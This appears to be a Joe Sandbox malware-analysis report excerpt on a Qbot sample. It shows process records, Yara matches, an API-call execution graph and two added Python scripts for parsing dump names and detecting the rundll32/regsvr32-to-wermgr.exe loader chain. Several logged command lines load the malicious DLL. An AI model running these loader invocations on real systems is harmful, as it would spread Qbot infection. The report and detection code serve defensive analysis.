          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          Target ID:6
          Start time:17:27:40
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServer
          Imagebase:0x1280000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:7
          Start time:17:27:43
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\wermgr.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\wermgr.exe
          Imagebase:0x970000
          File size:191904 bytes
          MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          Reputation:moderate

          Target ID:8
          Start time:17:27:43
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\wermgr.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\wermgr.exe
          Imagebase:0x970000
          File size:191904 bytes
          MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

          Target ID:9
          Start time:17:27:43
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\wermgr.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\wermgr.exe
          Imagebase:0x970000
          File size:191904 bytes
          MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
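The Yara hits listed for targets 3 to 9 are all against memory dumps, and the dump name carries the pivot data an analyst needs: which process, at which base address, and under which page protection the payload was found. The script below is an added example, not part of the report or of Joe Sandbox. The dump-name layout it assumes, `<target>.<field2>.<dump>.<base>.<protect>.<three more fields>.sdmp`, is inferred from the values on this page: the first field matches the report's target IDs, the fourth the region base, and the fifth is read as the Win32 PAGE_* protection (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE). The remaining fields are kept but not interpreted. The sample lines are copied from the match lists above.

```python
"""Parse the memory-dump identifiers behind this report's Yara matches and
group the hits by process and region, separating executable (unpacked code)
regions from plain read/write buffers.

Added example, not code from the report or Joe Sandbox. Field positions in the
dump name are an assumption inferred from the values on this page.
"""
import re
from collections import defaultdict

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80

# Match lines copied from the report (a subset; the others have the same shape).
MATCH_LINES = """
Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
"""

LINE = re.compile(r"Rule: (?P<rule>\S+), Description: (?P<desc>.*?), Source: (?P<src>\S+), Author: (?P<author>.*)$")
SOURCE = re.compile(
    r"^(?P<target>[0-9a-f]{8})\.(?P<field2>[0-9a-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<rest>(?:[0-9a-f]{8}\.){3})sdmp$",
    re.IGNORECASE,
)


def parse_source(src):
    """Decode one dump identifier into its assumed fields."""
    m = SOURCE.match(src)
    if not m:
        raise ValueError(f"unrecognised dump name: {src}")
    protect = int(m["protect"], 16)
    return {
        "target": int(m["target"], 16),
        "dump": int(m["dump"]),
        "base": int(m["base"], 16),
        "protect": protect,
        "protect_name": PAGE_PROTECT.get(protect & 0xff, f"{protect:#x}"),
        "executable": bool(protect & PAGE_EXECUTE_MASK),
        # fields whose meaning is not established here, kept for reference
        "unparsed": m["field2"] + "." + m["rest"].rstrip("."),
    }


def parse_matches(text):
    """Turn 'Rule: ..., Description: ..., Source: ..., Author: ...' lines into records."""
    records = []
    for line in text.strip().splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        rec = parse_source(m["src"])
        rec.update(rule=m["rule"], description=m["desc"], author=m["author"])
        records.append(rec)
    return records


def executable_hits(records):
    """{(target, base): sorted rule names} for hits inside executable regions:
    the regions to carve first when extracting the unpacked payload."""
    grouped = defaultdict(set)
    for r in records:
        if r["executable"]:
            grouped[(r["target"], r["base"])].add(r["rule"])
    return {key: sorted(rules) for key, rules in grouped.items()}


if __name__ == "__main__":
    for (target, base), rules in sorted(executable_hits(parse_matches(MATCH_LINES)).items()):
        print(f"target {target} region {base:#x}: {', '.join(rules)}")
```

For the lines above this yields two executable regions, 0x3160000 in target 3 (regsvr32.exe) and 0x2C60000 in target 7 (wermgr.exe); the 0x3140000 hit in target 3 is a PAGE_READWRITE buffer captured during execution, which is where the payload sits before it is copied into an executable region.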

          Target ID:10
          Start time:17:27:44
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailable
          Imagebase:0x1280000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
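The process list above shows the full execution chain the sandbox drove: loaddll32.exe, cmd.exe and regsvr32.exe loading pebbles.dat.dll, rundll32.exe calling export #1 by ordinal and then DllRegisterServer, and three instances of wermgr.exe started with a bare command line that end up carrying Qbot in memory. The following script is an added example (not code from the report or from Joe Sandbox) that runs the command lines from this list through the kind of process-creation heuristics a detection engineer would derive from them: a loader handed a module with a double or non-DLL extension, an export invoked by ordinal, and wermgr.exe launched with no arguments or by one of the loaders. The event records are constructed from the report; the parent images in them, the list of loader binaries, and the assumption that legitimate wermgr.exe launches carry switches are this example's own, not facts the report states.

```python
"""Process-creation heuristics for the rundll32/regsvr32 -> wermgr.exe chain in
this report. Added example, not part of the report or Joe Sandbox. Command
lines are copied from the process list; parent images are assumed.
"""
import re
from pathlib import PureWindowsPath

LOADERS = {"rundll32.exe", "regsvr32.exe", "loaddll32.exe"}
LOADABLE_EXTENSIONS = {".dll", ".ocx", ".cpl", ".ax", ".drv"}  # assumed expected extensions

# Constructed events: (target id from the report, assumed parent image, command line)
EVENTS = [
    (0, r"C:\Windows\explorer.exe", r'loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll"'),
    (1, r"C:\Windows\System32\loaddll32.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (2, r"C:\Windows\System32\loaddll32.exe", r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1'),
    (3, r"C:\Windows\System32\loaddll32.exe", r"regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll"),
    (4, r"C:\Windows\SysWOW64\cmd.exe", r'rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1'),
    (5, r"C:\Windows\System32\loaddll32.exe", r"rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer"),
    (7, r"C:\Windows\SysWOW64\regsvr32.exe", r"C:\Windows\SysWOW64\wermgr.exe"),
]

TOKEN = re.compile(r'(?:"[^"]*"|\S)+')


def tokens(cmdline):
    """Split a Windows command line on whitespace, keeping quoted spans whole
    (so '"C:\\path with space\\x.dll",#1' stays one token) and dropping the quotes."""
    return [t.replace('"', "") for t in TOKEN.findall(cmdline)]


def parse_loader(argv):
    """Return (module, export) for a rundll32/regsvr32/loaddll32 invocation,
    following 'cmd.exe /C' into the command it runs; None for anything else."""
    if not argv:
        return None
    exe = PureWindowsPath(argv[0]).name.lower()
    if exe == "cmd.exe" and len(argv) > 2 and argv[1].lower() in ("/c", "/k"):
        return parse_loader(argv[2:])
    if exe not in LOADERS:
        return None
    args = [a for a in argv[1:] if not a.startswith(("/", "-"))]  # drop switches such as /s
    if not args:
        return None
    if exe == "rundll32.exe":
        module, _, export = args[0].partition(",")  # rundll32 takes <module>,<export|#ordinal>
        return module, export or None
    return args[0], None


def loader_findings(cmdline):
    """Heuristics on the module a loader was asked to load."""
    parsed = parse_loader(tokens(cmdline))
    if parsed is None:
        return []
    module, export = parsed
    name = PureWindowsPath(module).name
    suffixes = [s.lower() for s in PureWindowsPath(name).suffixes]
    out = []
    if not suffixes or suffixes[-1] not in LOADABLE_EXTENSIONS:
        out.append(f"module without a DLL-type extension: {name}")
    if len(suffixes) > 1:
        out.append(f"double extension on loaded module: {name}")
    if export and export.startswith("#"):
        out.append(f"export invoked by ordinal {export}, name not visible in the command line")
    return out


def wermgr_findings(cmdline, parent_image):
    """Heuristics for wermgr.exe, the process that holds the payload in this report."""
    argv = tokens(cmdline)
    if not argv or PureWindowsPath(argv[0]).name.lower() != "wermgr.exe":
        return []
    out = []
    if len(argv) == 1:
        # Assumption: scheduled WER launches carry switches such as -upload or
        # -queuereporting, so a bare wermgr.exe is worth a second look.
        out.append("wermgr.exe started with no arguments")
    if PureWindowsPath(parent_image).name.lower() in LOADERS:
        out.append(f"wermgr.exe spawned by {PureWindowsPath(parent_image).name}")
    return out


def scan(events):
    """Map target id -> findings for every event that trips a heuristic."""
    hits = {}
    for target, parent, cmdline in events:
        findings = loader_findings(cmdline) + wermgr_findings(cmdline, parent)
        if findings:
            hits[target] = findings
    return hits


if __name__ == "__main__":
    for target, findings in sorted(scan(EVENTS).items()):
        print(f"target {target}:")
        for f in findings:
            print("  -", f)
```

Every loader invocation in the list trips the double-extension check on pebbles.dat.dll, targets 2 and 4 additionally trip the ordinal check for `,#1`, and target 7 trips both wermgr.exe checks; conhost.exe (target 1) produces nothing. A benign `rundll32.exe shell32.dll,Control_RunDLL` also produces nothing, which is the false-positive floor these heuristics need before they are turned into a rule.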


            Execution Graph

            Execution Coverage:6.1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:5.1%
            Total number of Nodes:2000
            Total number of Limit Nodes:51
[Execution graph: node and edge data of the interactive graph widget, not reproduced. All graph nodes lie at addresses in the 0x3160000 region, the unpacked code that the Yara rules matched in target 3. The API calls visible on its edges are: RtlAllocateHeap, GetSystemTimeAsFileTime, GetTickCount, GetDC, CreateCompatibleDC, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, BitBlt, GetCursorInfo, CopyIcon, GetIconInfo, GetObjectW, DrawIconEx, GetDIBits, DeleteDC, DeleteObject (the screenshot-capture chain behind the "Contains functionality to record screenshots" signature), GetModuleHandleW, GetProcAddress, SwitchToThread, GetCurrentProcessId, GetLastError, lstrlenW, lstrcpynA, memset, memchr, strncpy, strchr, _snprintf, qsort, localeconv, _errno, _strtoi64, strtod and _time64.]
14556 31724ff 14551->14556 14552 3172528 memchr 14552->14556 14552->14557 14553 3171e6f 8 API calls 14553->14556 14554 31725e0 17 API calls 14554->14556 14555 31712d9 strncpy 14555->14556 14556->14552 14556->14553 14556->14554 14556->14555 14556->14557 14557->14529 14559 31723f5 14558->14559 14560 3171e6f 8 API calls 14559->14560 14562 3172410 14559->14562 14563 3172408 14560->14563 14561 31725e0 18 API calls 14561->14563 14562->14529 14563->14561 14563->14562 14564 3171e6f 8 API calls 14563->14564 14564->14563 14565->14061 14567 3169fa5 2 API calls 14566->14567 14568 31669c7 14567->14568 14569 316e795 14568->14569 14570 3169f85 2 API calls 14569->14570 14571 316e7aa 14570->14571 14718 316e485 CoInitializeEx CoInitializeSecurity CoCreateInstance 14571->14718 14574 3168d9a 2 API calls 14575 316e7c2 14574->14575 14576 3169f85 2 API calls 14575->14576 14591 31669cc 14575->14591 14577 316e7d6 14576->14577 14578 3169f85 2 API calls 14577->14578 14579 316e7e7 14578->14579 14725 316e6d9 SysAllocString SysAllocString 14579->14725 14581 316e7f8 14582 316e826 14581->14582 14584 3169ab3 RtlAllocateHeap 14581->14584 14583 3168d9a 2 API calls 14582->14583 14586 316e82f 14583->14586 14585 316e807 VariantClear 14584->14585 14585->14582 14588 3168d9a 2 API calls 14586->14588 14589 316e838 14588->14589 14731 316e539 14589->14731 14591->14068 14593 3169f85 2 API calls 14592->14593 14594 316e85b 14593->14594 14595 316e485 6 API calls 14594->14595 14596 316e865 14595->14596 14597 3168d9a 2 API calls 14596->14597 14598 316e873 14597->14598 14599 3166a80 14598->14599 14600 3169f85 2 API calls 14598->14600 14615 316e8fa 14599->14615 14601 316e887 14600->14601 14602 3169f85 2 API calls 14601->14602 14603 316e898 14602->14603 14604 316e6d9 10 API calls 14603->14604 14605 316e8a9 14604->14605 14606 316e8d7 14605->14606 14607 3169ab3 RtlAllocateHeap 14605->14607 14608 3168d9a 2 API calls 14606->14608 14609 316e8b8 VariantClear 14607->14609 14610 316e8e0 14608->14610 14609->14606 14612 
3168d9a 2 API calls 14610->14612 14613 316e8e9 14612->14613 14614 316e539 2 API calls 14613->14614 14614->14599 14616 3169f85 2 API calls 14615->14616 14617 316e90f 14616->14617 14618 316e485 6 API calls 14617->14618 14619 316e919 14618->14619 14620 3168d9a 2 API calls 14619->14620 14621 316e927 14620->14621 14622 3166a88 14621->14622 14623 3169f85 2 API calls 14621->14623 14638 3168dc9 RtlAllocateHeap 14622->14638 14624 316e93b 14623->14624 14625 3169f85 2 API calls 14624->14625 14626 316e94c 14625->14626 14627 316e6d9 10 API calls 14626->14627 14628 316e95d 14627->14628 14629 316e98b 14628->14629 14630 3169ab3 RtlAllocateHeap 14628->14630 14631 3168d9a 2 API calls 14629->14631 14632 316e96c VariantClear 14630->14632 14633 316e994 14631->14633 14632->14629 14634 3168d9a 2 API calls 14633->14634 14636 316e99d 14634->14636 14637 316e539 2 API calls 14636->14637 14637->14622 14638->14081 14639->14084 14641 316bbb1 14640->14641 14642 3168f63 memset 14641->14642 14643 316bbcf 14641->14643 14642->14643 14643->14082 14645 3168f63 memset 14644->14645 14646 316b87e 14645->14646 14647 3168f63 memset 14646->14647 14648 316b88a 14647->14648 14651 3166b0d 14648->14651 14657 316b9e2 14648->14657 14736 3168dc9 RtlAllocateHeap 14648->14736 14650 3168ddf 2 API calls 14650->14651 14651->14090 14652 3169a76 RtlAllocateHeap 14654 316b8f9 14652->14654 14653 3169bfd 2 API calls 14653->14654 14654->14651 14654->14652 14654->14653 14655 3168ddf 2 API calls 14654->14655 14656 316b9a8 14654->14656 14654->14657 14655->14654 14656->14657 14658 3169b26 2 API calls 14656->14658 14657->14650 14659 316b9cb 14658->14659 14659->14657 14660 316b9d1 14659->14660 14661 3168ddf 2 API calls 14660->14661 14661->14651 14719 316e4ca SysAllocString 14718->14719 14720 316e507 14718->14720 14721 316e4e5 14719->14721 14720->14574 14721->14720 14722 316e4e9 CoSetProxyBlanket 14721->14722 14722->14720 14723 316e500 14722->14723 14735 3168dc9 RtlAllocateHeap 14723->14735 14726 3169f85 2 API calls 14725->14726 
14727 316e704 SysAllocString 14726->14727 14728 3168d9a 2 API calls 14727->14728 14730 316e717 SysFreeString SysFreeString SysFreeString 14728->14730 14730->14581 14732 316e544 14731->14732 14733 3168ddf 2 API calls 14732->14733 14734 316e561 14733->14734 14734->14591 14735->14720 14736->14654 14748 3170542 GetTickCount 14747->14748 14749 3170531 __aulldiv 14747->14749 14748->14217 14749->14217 14751 31711b3 7 API calls 14750->14751 14752 3168156 14751->14752 14753 3168927 strncpy 14752->14753 14754 316816f 14753->14754 14755 3168927 strncpy 14754->14755 14756 3168183 14755->14756 14757 3168927 strncpy 14756->14757 14758 3168194 14757->14758 14759 3168927 strncpy 14758->14759 14760 31681a7 14759->14760 14761 3168927 strncpy 14760->14761 14762 31681bd 14761->14762 14763 3168927 strncpy 14762->14763 14764 31681d1 14763->14764 14765 3168927 strncpy 14764->14765 14766 31681ea 14765->14766 14767 3168927 strncpy 14766->14767 14768 31681fe 14767->14768 14769 3168927 strncpy 14768->14769 14770 3168212 14769->14770 14771 3168927 strncpy 14770->14771 14772 3168226 14771->14772 14773 3168927 strncpy 14772->14773 14774 316823c 14773->14774 14775 3168927 strncpy 14774->14775 14776 3168253 14775->14776 14906 3168983 14776->14906 14779 3168927 strncpy 14780 3168266 14779->14780 14781 3168927 strncpy 14780->14781 14782 316827a 14781->14782 14783 3168927 strncpy 14782->14783 14784 316828e 14783->14784 14785 3168983 5 API calls 14784->14785 14786 3168296 14785->14786 14787 3168927 strncpy 14786->14787 14788 31682a1 14787->14788 14789 3168983 5 API calls 14788->14789 14790 31682a9 14789->14790 14791 3168927 strncpy 14790->14791 14792 31682b4 14791->14792 14793 3168983 5 API calls 14792->14793 14794 31682bc 14793->14794 14795 3168927 strncpy 14794->14795 14796 31682c7 14795->14796 14797 3168927 strncpy 14796->14797 14798 31682db 14797->14798 14799 3168983 5 API calls 14798->14799 14800 31682e3 14799->14800 14801 3168927 strncpy 14800->14801 14802 31682ee 14801->14802 14803 3168927 
strncpy 14802->14803 14804 3168308 14803->14804 14805 3168983 5 API calls 14804->14805 14806 3168310 14805->14806 14807 3168927 strncpy 14806->14807 14808 316831b 14807->14808 14809 3168927 strncpy 14808->14809 14810 316832f 14809->14810 14811 3168927 strncpy 14810->14811 14812 3168343 14811->14812 14813 3168983 5 API calls 14812->14813 14814 3168357 14813->14814 14815 3168927 strncpy 14814->14815 14816 3168362 14815->14816 14817 3168927 strncpy 14816->14817 14818 3168376 14817->14818 14819 3168927 strncpy 14818->14819 14820 316838a 14819->14820 14821 3168983 5 API calls 14820->14821 14822 3168395 14821->14822 14823 3168927 strncpy 14822->14823 14824 31683a0 14823->14824 14825 3168983 5 API calls 14824->14825 14826 31683ab 14825->14826 14827 3168927 strncpy 14826->14827 14828 31683b6 14827->14828 14829 3168983 5 API calls 14828->14829 14830 31683c1 14829->14830 14831 3168927 strncpy 14830->14831 14832 31683cc 14831->14832 14833 3168983 5 API calls 14832->14833 14834 31683d7 14833->14834 14835 3168927 strncpy 14834->14835 14836 31683e2 14835->14836 14837 3168983 5 API calls 14836->14837 14838 31683ed 14837->14838 14839 3168927 strncpy 14838->14839 14840 31683f8 14839->14840 14841 3168983 5 API calls 14840->14841 14842 3168403 14841->14842 14843 3168927 strncpy 14842->14843 14844 316840e 14843->14844 14845 3168983 5 API calls 14844->14845 14846 3168419 14845->14846 14847 3168927 strncpy 14846->14847 14848 3168424 14847->14848 14911 3169b62 14906->14911 14908 3168996 14909 3168ddf 2 API calls 14908->14909 14910 316825b 14908->14910 14909->14910 14910->14779 14912 3169b71 WideCharToMultiByte 14911->14912 14918 3169bc1 14911->14918 14913 3169b8c 14912->14913 14912->14918 14920 3168dc9 RtlAllocateHeap 14913->14920 14915 3169b95 14916 3169b9d WideCharToMultiByte 14915->14916 14915->14918 14917 3169bb6 14916->14917 14916->14918 14919 3168ddf 2 API calls 14917->14919 14918->14908 14919->14918 14920->14915 14922 3169913 14921->14922 14923 31736d5 2 API calls 14922->14923 
14925 316995d 14923->14925 14924 3167ae9 14924->14235 14925->14924 14926 31736d5 2 API calls 14925->14926 14926->14925 14928 31711b3 7 API calls 14927->14928 14929 3167f21 14928->14929 14930 3168927 strncpy 14929->14930 14931 3167f37 14930->14931 14932 3168927 strncpy 14931->14932 14933 3167f4c 14932->14933 14934 3168927 strncpy 14933->14934 14935 3167f60 14934->14935 14936 3168927 strncpy 14935->14936 14937 3167f75 14936->14937 14938 3168927 strncpy 14937->14938 14939 3167f86 14938->14939 14940 3168927 strncpy 14939->14940 14941 3167f9f 14940->14941 14942 3168927 strncpy 14941->14942 14943 3167fb5 14942->14943 14944 3168927 strncpy 14943->14944 14945 3167fc6 14944->14945 14946 3168927 strncpy 14945->14946 14947 3167fda 14946->14947 14948 3168927 strncpy 14947->14948 14949 3167fed 14948->14949 14950 3168927 strncpy 14949->14950 14951 3168001 14950->14951 14952 3168927 strncpy 14951->14952 14953 3168020 14952->14953 14954 3168983 5 API calls 14953->14954 14955 3168031 14954->14955 14956 3168927 strncpy 14955->14956 14957 316803c 14956->14957 14958 3168983 5 API calls 14957->14958 14959 316804d 14958->14959 14960 3168927 strncpy 14959->14960 14961 3168058 14960->14961 14962 3168927 strncpy 14961->14962 14963 3168074 14962->14963 14964 3171c34 13 API calls 14963->14964 14965 316807c 14964->14965 14965->14239 14967 3171d21 18 API calls 14966->14967 14969 316795d 14967->14969 14968 3167969 14968->14250 14969->14968 14970 316a06e memset 14969->14970 14971 316799d 14970->14971 14971->14968 15000 3168dc9 RtlAllocateHeap 14971->15000 14973 3167a75 14975 3168ddf 2 API calls 14973->14975 14977 3167a86 14973->14977 14974 3167a21 14974->14968 14974->14973 14976 3169a76 RtlAllocateHeap 14974->14976 14975->14973 14976->14974 14978 3168ddf 2 API calls 14977->14978 14978->14968 14980 3167826 14979->14980 14981 316bfc8 2 API calls 14980->14981 14989 31678b6 14980->14989 14982 3167842 14981->14982 14982->14989 14992 316788e 14982->14992 15001 3168dc9 RtlAllocateHeap 14982->15001 
14984 3168ddf 2 API calls 14986 31678ac 14984->14986 14985 316785f 14988 3169fa5 2 API calls 14985->14988 14985->14992 14987 3168ddf 2 API calls 14986->14987 14987->14989 14990 316787e 14988->14990 14989->14253 14989->14260 15002 3168bbb 14990->15002 14992->14984 15018 316808f 14993->15018 14995 31677db 14996 31676f8 19 API calls 14995->14996 14997 31677fb 14996->14997 14998 3168ddf 2 API calls 14997->14998 14999 3167806 14998->14999 14999->14260 15000->14974 15001->14985 15005 3168a4f 15002->15005 15012 31689b9 15005->15012 15007 3168a7c 15007->14992 15008 3168aa8 GetLastError 15011 3168b37 15008->15011 15009 3168a75 15009->15007 15009->15008 15009->15011 15010 3168ddf 2 API calls 15010->15007 15011->15010 15017 3168dc9 RtlAllocateHeap 15012->15017 15014 31689ca 15015 3168a1b lstrlenW 15014->15015 15016 3168a2c 15014->15016 15015->15016 15016->15009 15016->15016 15017->15014 15019 31711b3 7 API calls 15018->15019 15020 316809e 15019->15020 15021 3168927 strncpy 15020->15021 15022 31680b4 15021->15022 15023 3168927 strncpy 15022->15023 15024 31680c8 15023->15024 15025 3168927 strncpy 15024->15025 15026 31680d9 15025->15026 15027 3168927 strncpy 15026->15027 15028 31680ea 15027->15028 15029 3168927 strncpy 15028->15029 15030 31680ff 15029->15030 15031 3168927 strncpy 15030->15031 15032 3168115 15031->15032 15033 3168927 strncpy 15032->15033 15034 316812b 15033->15034 15035 3171c34 13 API calls 15034->15035 15036 3168133 15035->15036 15036->14995 11204 3166603 11205 3166611 11204->11205 11210 3166669 11204->11210 11233 3168db4 HeapCreate 11205->11233 11207 3166616 11234 3169787 11207->11234 11217 3166664 11219 3168d9a 2 API calls 11217->11219 11218 316666e 11254 3168d9a 11218->11254 11219->11210 11226 31666c5 CreateThread 11226->11210 11334 31663a2 11226->11334 11227 316f0d9 8 API calls 11228 31666a0 11227->11228 11267 316647a memset 11228->11267 11233->11207 11286 3168dc9 RtlAllocateHeap 11234->11286 11236 316661b 11237 3173d36 11236->11237 11238 3173d6b 
11237->11238 11287 3168e2e 11238->11287 11240 3166629 11241 316f0d9 11240->11241 11291 3169f6b 11241->11291 11244 316f103 LoadLibraryA 11246 316f10a 11244->11246 11245 316f0fb GetModuleHandleA 11245->11246 11247 316f118 11246->11247 11294 316f08e 11246->11294 11299 3168d87 11247->11299 11251 3169f85 11317 3168ca3 11251->11317 11253 3166650 GetFileAttributesW 11253->11217 11253->11218 11255 3168da8 11254->11255 11257 3166673 11254->11257 11256 3168ddf 2 API calls 11255->11256 11256->11257 11258 316109a 11257->11258 11259 3168ca3 2 API calls 11258->11259 11260 31610b5 11259->11260 11261 316fcda 11260->11261 11262 316fcf6 11261->11262 11263 3166687 11262->11263 11323 3168dc9 RtlAllocateHeap 11262->11323 11263->11226 11263->11227 11265 316fd09 11265->11263 11266 3168ddf 2 API calls 11265->11266 11266->11263 11324 3161080 11267->11324 11269 31664a6 11270 31664b7 11269->11270 11271 31664f8 11269->11271 11273 3161080 2 API calls 11270->11273 11272 3161080 2 API calls 11271->11272 11274 3166502 11272->11274 11275 31664c1 11273->11275 11278 3168d87 2 API calls 11274->11278 11327 3169fa5 11275->11327 11277 31664d7 11279 3168d87 2 API calls 11277->11279 11280 31664e2 11278->11280 11279->11280 11281 3168ddf 11280->11281 11282 31666b5 11281->11282 11283 3168de9 11281->11283 11282->11226 11283->11282 11284 3168f63 memset 11283->11284 11285 3168e19 HeapFree 11284->11285 11285->11282 11286->11236 11290 3168dc9 RtlAllocateHeap 11287->11290 11289 3168e3f 11289->11240 11290->11289 11303 3168bcd 11291->11303 11310 3168dc9 RtlAllocateHeap 11294->11310 11296 316f0cf 11296->11247 11297 316f0a0 11297->11296 11311 316ef38 11297->11311 11300 3168d8f 11299->11300 11301 316663f 11299->11301 11302 3168ddf 2 API calls 11300->11302 11301->11251 11302->11301 11304 3168be4 11303->11304 11308 3168c05 11303->11308 11304->11308 11309 3168dc9 RtlAllocateHeap 11304->11309 11305 3168c4c lstrlenW 11306 3168c58 11305->11306 11306->11244 11306->11245 11308->11305 11308->11306 11309->11308 11310->11297 
